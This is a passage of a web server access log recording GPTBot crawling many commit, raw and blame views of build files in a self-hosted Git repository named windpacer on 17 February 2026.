[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 97716] [Gzip 28.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 70873] [Gzip 17.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13547] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" +[17/Feb/2026:15:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13497] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11622] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44100] [Gzip 15.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44101] [Gzip 15.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13548] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" +[17/Feb/2026:15:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 98933] [Gzip 28.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58177] [Gzip 28.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58178] [Gzip 28.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 14238116] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11045] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15183] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13710] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:15:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:15:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 